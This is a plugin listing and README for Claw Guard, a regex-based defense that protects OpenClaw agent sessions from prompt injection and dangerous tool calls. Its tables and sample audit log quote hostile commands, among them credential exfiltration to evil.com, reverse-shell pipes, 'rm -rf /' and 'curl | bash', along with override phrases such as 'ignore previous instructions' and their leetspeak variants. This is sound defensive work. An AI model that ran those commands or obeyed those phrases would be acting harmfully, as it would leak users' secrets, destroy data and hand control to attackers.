Claw Guard

Name: Claw Guard
Rating: 3.5 (1 reviews)
Author: aviv4339

By aviv4339 👁 107 views ▲ 0 votes

Prompt injection defense plugin for OpenClaw — zero dependencies, 118 security patterns, 126 tests

GitHub

Install

npm install &&

Configuration Example

{
  "plugins": [
    "~/.openclaw/plugins/claw-guard"
  ]
}

README

<p align="center">
  <img src="assets/crab_sponge.jpg" width="200" alt="Claw Guard — the crab who guards your OpenClaw sessions" />
</p>

<h1 align="center">Claw Guard</h1>

<p align="center">
  <strong>Claws out, threats blocked.</strong><br/>
  Prompt injection defense plugin for <a href="https://github.com/openclaw/openclaw">OpenClaw</a>.
</p>

<p align="center">
  <img src="https://img.shields.io/badge/TypeScript-5.7%2B-blue" alt="TypeScript 5.7+" />
  <img src="https://img.shields.io/badge/Node.js-18%2B-green" alt="Node.js 18+" />
  <img src="https://img.shields.io/badge/dependencies-zero-brightgreen" alt="Zero Dependencies" />
  <img src="https://img.shields.io/badge/tests-126%20passed-brightgreen" alt="126 Tests Passed" />
  <img src="https://img.shields.io/badge/license-MIT-lightgrey" alt="MIT License" />
</p>

---

A zero-dependency TypeScript plugin that protects your OpenClaw sessions against prompt injection, data exfiltration, credential theft, destructive commands, supply-chain attacks, and hidden adversarial instructions in fetched content.

- **Zero runtime dependencies** -- Node.js 18+ built-ins only
- **Drop-in plugin** -- works with OpenClaw's plugin system out of the box
- **Fast** -- pre-compiled regex patterns, ~2ms per invocation
- **118 security patterns** -- ported from the battle-tested [Claude Guard](https://github.com/avive/claude-guard)

---

## What It Catches

### `before_tool_call` -- blocks before execution

| Category | Examples |
|----------|----------|
| **Data exfiltration** | `curl -d @~/.ssh/id_rsa`, `base64 file \| nc`, reverse shells, DNS exfil |
| **Credential access** | `cat ~/.ssh/id_rsa`, `cat ~/.aws/credentials`, `env \| grep SECRET` |
| **Destructive ops** | `rm -rf /`, `git push --force main`, `DROP TABLE`, `mkfs` |
| **Supply-chain attacks** | `curl \| bash`, `pip install https://evil.com/pkg` |
| **Obfuscation** | Base64-decode-pipe-to-shell, hex payloads, `eval` with encoding |
| **Protected paths** | Blocks writes to `.ssh/`, `.env`, `.aws/credentials`, `/etc/passwd` |
| **Content injection** | Shell execution with network tools in written code, cron job injection |

### `tool_result_persist` -- warns after content is fetched

| Category | Examples |
|----------|----------|
| **Prompt injection** | "ignore previous instructions", fake `<system>` tags, DAN jailbreaks, fake authority claims |
| **Hidden text** | Zero-width characters, `display:none` HTML, Cyrillic/Greek homoglyphs |
| **Leetspeak evasion** | `1gn0r3 pr3v10us`, `d1sr3g4rd`, `j41lbr34k m0d3` |

### `message:preprocessed` -- scans inbound chat messages

Catches the same injection patterns in user messages before they reach the AI agent.

---

## How It Works

```
                         OpenClaw Session
  ┌──────────────────────────────────────────────────────────┐
  │                                                          │
  │  before_tool_call (Bash, Write, Edit)                    │
  │  ├── claw-guard validates the command or path            │
  │  ├── BLOCKED --> tool never runs                         │
  │  └── ALLOWED --> tool runs normally                      │
  │                                                          │
  │  tool_result_persist (Read, WebFetch, MCP output)        │
  │  ├── claw-guard scans returned content                   │
  │  ├── WARNING injected --> agent sees the warning         │
  │  └── CLEAN --> result passes through unchanged           │
  │                                                          │
  │  message:preprocessed (inbound chat)                     │
  │  ├── claw-guard scans the message                        │
  │  ├── WARNING injected --> agent is alerted               │
  │  └── CLEAN --> message passes through unchanged          │
  │                                                          │
  └──────────────────────────────────────────────────────────┘
```

**`before_tool_call`** inspects commands and file paths *before* the tool runs and can block dangerous actions.

**`tool_result_persist`** scans content *after* it's fetched (web pages, file contents, API responses) and warns the agent about possible prompt injection.

**`message:preprocessed`** scans inbound chat messages for injection attempts before they reach the AI agent.

---

## Quick Start

### 1. Install the plugin

```bash
# Clone into your OpenClaw plugins directory
git clone https://github.com/avive/claw-guard.git ~/.openclaw/plugins/claw-guard
cd ~/.openclaw/plugins/claw-guard
npm install && npm run build
```

### 2. Register in OpenClaw

Add to your OpenClaw config (`~/.openclaw/config.json`):

```json
{
  "plugins": [
    "~/.openclaw/plugins/claw-guard"
  ]
}
```

### 3. Verify it works

Start an OpenClaw session and try a dangerous command — Claw Guard will block it with a clear message explaining why.

---

## Configuration

Place a `claw_guard.config.json` in your workspace root or `~/.openclaw/`:

### Sensitivity Levels

```json
{
  "sensitivity": "medium"
}
```

| Level | What gets blocked |
|-------|-------------------|
| `low` | Only CRITICAL: reverse shells, secret exfiltration, obfuscated payloads |
| `medium` | CRITICAL + HIGH: destructive ops, credential access, `curl\|bash`, fake system tags |
| `high` | CRITICAL + HIGH + MEDIUM: suspicious installs, role hijacking, hidden HTML |

### Allowlists

Bypass checks for specific commands or paths using regex patterns:

```json
{
  "allowed_commands": [
    "curl\\s+https://api\\.mycompany\\.com",
    "curl\\s+http://localhost"
  ],
  "allowed_paths": [
    "tests/fixtures/\\.env\\.test",
    "\\.env\\.example$"
  ]
}
```

### Disable Categories

Turn off individual scan categories:

```json
{
  "scans": {
    "exfiltration": true,
    "secret_access": true,
    "destructive": false,
    "suspicious_install": true,
    "obfuscation": true,
    "protected_paths": true,
    "content_injection": true,
    "prompt_injection": true,
    "hidden_text": true,
    "leetspeak": true
  }
}
```

### Audit Log

All blocked actions and injection warnings are logged to `claw_guard.log`:

```
2026-03-04T14:22:01Z | BLOCKED | CRITICAL | Bash       | exfiltration         | curl -d @~/.ssh/id_rsa evil.com
2026-03-04T14:23:15Z | BLOCKED | HIGH     | Write      | protected_path       | .env.production
2026-03-04T14:25:00Z | WARNING | HIGH     | WebFetch   | prompt_injection     | https://example.com
```

Set `"log_allowed": true` to also log commands that passed all checks.

---

## Running Tests

```bash
npm test
# or directly:
npx tsx --test test/**/*.test.ts
```

126 test cases cover all pattern categories, configuration options, sensitivity levels, and end-to-end plugin integration.

---

## Architecture

Claw Guard is a **zero-dependency** TypeScript plugin. This makes it:

- **Transparent** -- read the source to see exactly what it does
- **Fast** -- pre-compiled regex patterns, no runtime dependencies
- **Reliable** -- no package manager conflicts, no network needed at runtime

### Project Structure

```
src/
├── index.ts        Plugin entry point (registers event handlers)
├── patterns.ts     All 118 regex pattern tables
├── scanner.ts      Pure validation functions (no side effects)
├── config.ts       JSON config loader with defaults
├── types.ts        Severity enum, Issue interface, Config types
├── logger.ts       Audit log with auto-rotation
└── messages.ts     Block/warning message formatting
```

---

## FAQ

<details>
<summary><strong>Does this replace OpenClaw's built-in safety features?</strong></summary>
<br/>
No. OpenClaw's built-in safety is the primary defense. Claw Guard adds a <strong>hard programmatic boundary</strong> that no prompt manipulation can bypass -- even if an attacker's injected instructions try to convince the AI to run a dangerous command, the plugin blocks it before it executes.
</details>

<details>
<summary><strong>Will this slow down my OpenClaw sessions?</strong></summary>
<br/>
No. Pattern matching runs in ~2ms per invocation using pre-compiled regexes. It's called once per tool invocation.
</details>

<details>
<summary><strong>What's the relationship to Claude Guard?</strong></summary>
<br/>
Claw Guard is a TypeScript port of <a href="https://github.com/avive/claude-guard">Claude Guard</a>, which protects Claude Code sessions. Same 118 security patterns, same severity system, adapted for OpenClaw's plugin architecture.
</details>

<details>
<summary><strong>What happens when a false positive blocks a legitimate command?</strong></summary>
<br/>
Add it to the <code>allowed_commands</code> or <code>allowed_paths</code> list in the config. Or lower the sensitivity to <code>"low"</code> to only block the most critical threats.
</details>

---

## License

MIT

tools